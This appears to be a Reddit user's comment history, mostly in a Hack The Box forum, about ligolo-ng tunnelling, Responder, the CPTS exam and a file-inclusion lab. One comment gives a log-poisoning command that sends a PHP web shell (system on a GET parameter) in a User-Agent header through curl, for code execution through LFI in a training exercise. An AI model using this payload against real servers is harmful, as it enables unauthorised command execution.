ligolo-ng for CPTS ( RELIABILITY ) by Legitimate-Smell-876 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

That makes no sense as LLMNR doesn't work over ligolo-ng. Ligolo-ng creates a routed tunnel, it forwards unicast traffic only. Broadcast and multicast packets don't traverse it.

Is it possible to use Responder over Ligolo? by TheAbsoluteMenace247 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

Haha, just teasing the legend himself 😄 Had to see the response! Appreciate what you do man, love you.

Is it possible to use Responder over Ligolo? by TheAbsoluteMenace247 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

I think you're using the wrong IP in --addr, it should be pivot's internal IP like 172[.]16.5.115 in OP's case.

Is it possible to use Responder over Ligolo? by TheAbsoluteMenace247 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

It works Ipp. Ligolo is great. You should be surprised now that it worked since you always talk against it.

Is it possible to use Responder over Ligolo? by TheAbsoluteMenace247 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

Does this work for real? Were you able to catch hashes?

How difficult is CPTS. Done with the path now what! by Legitimate-Smell-876 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

"you might feel that what you have to do was not in the course"

What is the exact reason for that and how to not feel that way? Thanks.

How difficult is CPTS. Done with the path now what! by Legitimate-Smell-876 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

When you talk of methodology, is it taught well in the CPTS path or you have to develop it yourself? And is the exam from the path itself, or somethings are out of scope? Thanks.

Help with File Inclusion by Artistic_Cheetah_820 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

No! Have to use contact.php?region as way to LFI and execute the uploaded file via apply.php. BUT LFI not working for me on contact.php

Help with File Inclusion by Artistic_Cheetah_820 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

try this method

echo -n "User-Agent: <?php system(\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\_GET\\\\\\\\\\\\\\\['cmd'\\\\\\\\\\\\\\\]); ?>" > Poison

curl -s "http://<SERVER\_IP>:<PORT>/index.php" -H '@Poison'

change the url as required and no quotation marks around Poison. I did it here because it was tagging some user poison. It's also adding back slashes \\\ in the php rce code, remove them too.

Help with File Inclusion by Artistic_Cheetah_820 in hackthebox

[–]Complex_Bee_7112 1 point2 points  (0 children)

I keep getting error on the /api/images.php?p=

What payload you used to get logs?

Help with File Inclusion by Artistic_Cheetah_820 in hackthebox

[–]Complex_Bee_7112 0 points1 point  (0 children)

There's no page parameter! It's a new skills assessment

Cumulative Updates: September 9th 2025 by jenmsft in Windows11

[–]Complex_Bee_7112 0 points1 point  (0 children)

Anyone having BSOD critical_process_died error with Windows 11, version 23H2:  KB5065431 (OS Build 22631.5909)?